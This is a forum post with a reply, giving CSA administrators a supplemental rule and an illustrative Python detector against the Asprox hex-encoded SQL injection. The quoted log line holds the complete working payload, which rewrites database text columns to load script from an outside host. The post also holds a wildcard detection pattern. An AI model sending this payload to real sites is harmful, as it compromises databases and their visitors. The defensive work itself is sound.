Cisco Support Community
Community Member

CSA - asprox and supplemental SQL injection protection

For those of you running CSA to protect your IIS web server, which may also be utilizing SQL, you may want to supplement your existing DAC rules.

Asprox/Danmec obfuscates the SQL injection by hex-encoding it inside a CAST statement, like so:

The process 'C:\WINNT\system32\inetsrv\inetinfo.exe' (as user NT AUTHORITY\SYSTEM) attempted to receive the data '/page.asp?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72% 20AS%20CHAR(4000));EXEC(@S);'. The operation was allowed by a rule (rule defaults).

In the rule originally named "IIS and Apache Web Servers, Common SQL Server command injection exploits", open the data set of the same name. Add the following:

*DECLARE*SET*CAST*

In case you have a page that is vulnerable to a SQL injection (and aren't aware of it yet), you are now protected.
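
The check below is an added example, not part of the original post and not CSA code: it emulates the `*DECLARE*SET*CAST*` wildcard in Python against constructed request URIs and decodes the hex literal inside CAST(...) so an analyst can read what was injected. URL-decoding and case-folding before matching are assumptions about normalization, and the function names and sample URIs (carrying a harmless `SELECT 1` payload) are made up for the illustration.

```python
import re
from fnmatch import fnmatchcase
from urllib.parse import unquote

# Wildcard pattern from the post, as added to the CSA data set.
PATTERN = "*DECLARE*SET*CAST*"

# Hex literal inside CAST(0x... AS ...); used only to decode it for triage.
CAST_HEX = re.compile(r"CAST\(\s*0x([0-9A-Fa-f]+)\s+AS\b", re.IGNORECASE)


def normalize(uri):
    """URL-decode and upper-case a request URI (assumed normalization)."""
    return unquote(uri).upper()


def matches_rule(uri):
    """True if the normalized URI matches the DECLARE/SET/CAST wildcard."""
    return fnmatchcase(normalize(uri), PATTERN)


def decode_cast_payload(uri):
    """Return the text hidden in CAST(0x...), or None if there is none."""
    m = CAST_HEX.search(unquote(uri))
    if not m:
        return None
    hexstr = m.group(1)
    if len(hexstr) % 2:          # odd length: drop the dangling nibble
        hexstr = hexstr[:-1]
    return bytes.fromhex(hexstr).decode("latin-1")


# Constructed sample requests; 0x53454C4543542031 is hex for "SELECT 1".
SAMPLES = [
    "/page.asp?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x53454C4543542031"
    "%20AS%20CHAR(4000));EXEC(@S);",
    "/page.asp?id=42",
    "/page.asp?;declare%20@s%20char(4000);set%20@s=cast(0x53454C4543542031"
    "%20as%20char(4000));exec(@s);",
    "/search.asp?q=declare+a+set+of+cast+members",  # benign, still matches
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(matches_rule(uri), repr(decode_cast_payload(uri)), uri[:40])
```

The last sample is an ordinary search query that still matches the wildcard, so run the pattern against your site's legitimate traffic before enforcing it.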

1 REPLY
Community Member

Re: CSA - asprox and supplemental SQL injection protection

Nice catch, thank you for the information.
